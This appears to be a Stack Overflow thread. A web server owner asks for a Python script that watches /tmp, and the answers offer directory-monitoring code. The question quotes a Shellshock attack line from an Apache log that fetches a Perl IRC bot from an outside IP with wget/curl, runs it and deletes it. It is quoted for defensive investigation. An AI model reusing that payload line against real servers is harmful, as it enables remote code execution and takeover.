# A python script to monitor a directory for new files

Tags: python

Similar questions have been asked but they either did not work for me or I failed to understand the answers.

I run Apache2 webserver and host a few petty personal sites. I am being *cyberstalked*, or someone is attempting to hack me.

The Apache2 access log shows

> 195.154.80.205 - - [05/Nov/2015:09:57:09 +0000] "GET /info.cgi HTTP/1.1" 404 464 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\r\n\r\nXSUCCESS!\";system(\"wget http://190.186.76.252/cox.pl -O /tmp/cox.pl;curl -O /tmp/cox.pl http://190.186.76.252/cox.pl;perl /tmp/cox.pl;rm -rf /tmp/cox.pl*\");'"

which is clearly attempting (over and over again in my logs) to force my server to download 'cox.pl' then run 'cox.pl' then remove 'cox.pl'.

I really want to know what is in `cox.pl` which could be a modified version of [Cox-Data-Usage](https://github.com/dcraig/Cox-Data-Usage/blob/master/cox.pl) which is there on github.

I would like a script that will constantly monitor my `/tmp` folder, and when a new file is added then copy that file to another directory for me to see what it is doing, or attempting to do at least.

I know I could deny access etc. but I want to find out what these hackers are trying to do and see if I can gather intel about them.

Comment: You requested python - however, you might want to look at `inotifywait`.  I think what you want to do could be accomplished with a short command-line pipeline.

Comment: I'm not very sure, but eventually sockets could be used: https://docs.python.org/2/howto/sockets.html

Comment: Have a look at [dircache](https://pymotw.com/2/dircache/)

Comment: You are most likely not being stalked, just the server is on a list of places being probed for a known vulnerability by some script. See https://packetstormsecurity.com/files/127428/D-Link-info.cgi-POST-Request-Buffer-Overflow.html - the `cox.pl` is payload, and would run if you were affected by the vulnerability.

Comment: There shouldn't be anything in `/tmp` in the first place (as a result of this issue, that is), because you shouldn't be accepting arbitrary code via query string and `eval`-ing it!

Comment: @Matt Jacob, The attack in question relies on a severe bug in `bash`. No `eval` involved.

Comment: Re "I really want to know what is in 'cox.pl'", So download it. Just don't run it.

Comment: You've made sure your shell isn't vulnerable to the Shellshock exploit so that your server isn't downloading the file in the first place, right?

Comment: @ikegami I have tried to wget cox.pl but `no route to host`, my guess is it is coming from a personal computer with dynamic IP changing. I cant ping the IP , I know its owned by 'Iliad Entreprises Customers' an ISP in France, as who.is says it is. @neil slater I once played around with BackTrack4 a few years ago so I know an attempted hack when I see one, it wouldn't run if perl were not on my system (just as an e.g.)

Comment: @chepner I am fairly security minded so I continuasly check for major vulnerabilties (and less major ones) I always update to new versions anyway especially with something like ShellShock, thanks for that though.

Comment: @Brian .. D'oh forgot about `inotifywait`, I will look into that thanks.

Comment: @Neil Slater are you trying to say D-Link-info.cgi-POST-Request-Buffer-Overflow is cox.pl? ..In this case I mean?

Comment: r.e looking into D-Link-info.cgi-POST-Request-Buffer-Overflow and only just realised my router is in fact a D-link router, I'm pretty tired after researching this for a while. :/ Any Ideas on getting rid of the vulnerability?

Comment: @jamiejackherer: No. The overflow is the vulnerability inside `info.cgi`. It allows execution of arbitrary code. The code you see in the request, and does what you say in the question - downloads `cox.pl` and runs it. If you don't have the vulnerability (you may not even have a bad version of  `info.cgi` installed or active), then nothing happens, the request is denied, but the hacking script just keeps on trying. However, if you do have it, then `cox.pl` will have been run on your device many times already.

Comment: Ahh That makes sense to me now, it's been a long time since I've played about with hacking and such, it doesnt interest me now so I forgot a lot of simple terms and meanings. The `grep`ed log is on pastebin if anyones interested in looking, http://pastebin.com/dUyV9ZEr

Comment: BINGO!!! I ran a while loop ( while sleep 20; do wget http://190.186.76.252/cox.pl; done) to see if the ip would ever come back online, and low and behold i have a copy of cox.pl now, they are running apache2.4 on a fedora box!

Comment: if anyones interested cox.pl .... http://pastebin.com/vq2NggDT

Comment: Looks like IRC client/remote shell written by someone with good hacking and poor perl skills. 123.196.116.66 irc server can be found on [`APNIC`](https://wq.apnic.net/whois-search/static/search.html)

Comment: " good hacking and poor perl skills" made me LOL

Comment: @Сухой27 You say 'good hacker' what makes you say that? Also I would guess the IP on my apache logs wont be the IP of the attacker (if he/she is that good), so likely to be from an already hacked box that they have pwned already?

Answer (score 1):

The script in question can be easily downloaded, it contains `ShellBOT by: devil__` so... guess ;-)

You could use [tutorial_notifier.py](https://github.com/seb-m/pyinotify/blob/master/python2/examples/tutorial_notifier.py) from [pyinotify](https://github.com/seb-m/pyinotify/wiki), but there's no need for this particular case. Just do

```
curl http://190.186.76.252/cox.pl -o cox.pl.txt
less cox.pl.txt
```

to check the script.

It looks like a good suite of hacks for Linux 2.4.17 - 2.6.17 and maybe BSD*, not that harmless to me, IRC related. It has nothing to do with [Cox-Data-Usage](https://github.com/dcraig/Cox-Data-Usage/blob/master/cox.pl).

Answer (score 1):

I got some solution,

solution 1 (*CPU usage: 27.9% approx= 30%*):

```
path_to_watch = "your/path"
print('Your folder path is"',path,'"')
before = dict ([(f, None) for f in os.listdir (path_to_watch)])
while 1:
        after = dict ([(f, None) for f in os.listdir (path_to_watch)])
        added = [f for f in after if not f in before]
        if added:
                print("Added: ", ", ".join (added))
                break
        else:
             before = after
```

I have edited the code, the orginal code is available at http://timgolden.me.uk/python/win32_how_do_i/watch_directory_for_changes.html

The original code was made in python 2x so you need to convert it in python 3.

NOTE:-

WHEN EVER YOU ADD ANY FILE IN PATH, IT PRINTS THE TEXT AND BREAKS, AND IF NO FILES ARE ADDED THEN IT WOULD CONTINUE TO RUN.

Solution 2 (*CPU usage: 23.4 approx=20%*)

```
    import os
path=r'C:\Users\Faraaz Anas Ammaar\Documents\Programming\Python\Eye-Daemon'
b=os.listdir(path)
path_len_org=len(b)
def file_check():
    while 1:
        b=os.listdir(path)
        path_len_final=len(b)
        if path_len_org<path_len_final:
            return "A file is added"    
        elif path_len_org>path_len_final:
            return "A file is removed"
        else:
            pass
file_check()
```

Comment: Not ideal ... That while loop is giving 100% CPU usage

Comment: that's just a solution...optimizing it on your device can be done from your side, and Jamie haven't asked for an optimized code. Anyways, I have a more optimized code.

Answer (score 1):

The solution to the question wouldn't lie in a python script, this is more of a security issue for the likes of Fail2ban or similar to handle, but there is a way to monitor a directory for changes using Python Watchdog. (pip install watchdog)

Taken from: https://pythonhosted.org/watchdog/quickstart.html#a-simple-example

```
import sys
import time
import logging
from watchdog.observers import Observer
from watchdog.events import LoggingEventHandler

if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO,
                        format='%(asctime)s - %(message)s',
                        datefmt='%Y-%m-%d %H:%M:%S')
    path = sys.argv[1] if len(sys.argv) > 1 else '.'
    event_handler = LoggingEventHandler()
    observer = Observer()
    observer.schedule(event_handler, path, recursive=True)
    observer.start()
    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        observer.stop()
    observer.join()
```

This will log all changes, (it can be configured for just file creation).
If you want to rename new files to something else, you first need to know if the file is free or any modifications will fail, i.e it's not finished downloading/creation. That issue can mean that a call to that file can come before you've moved or renamed it programmatically. That's why this isn't a solution.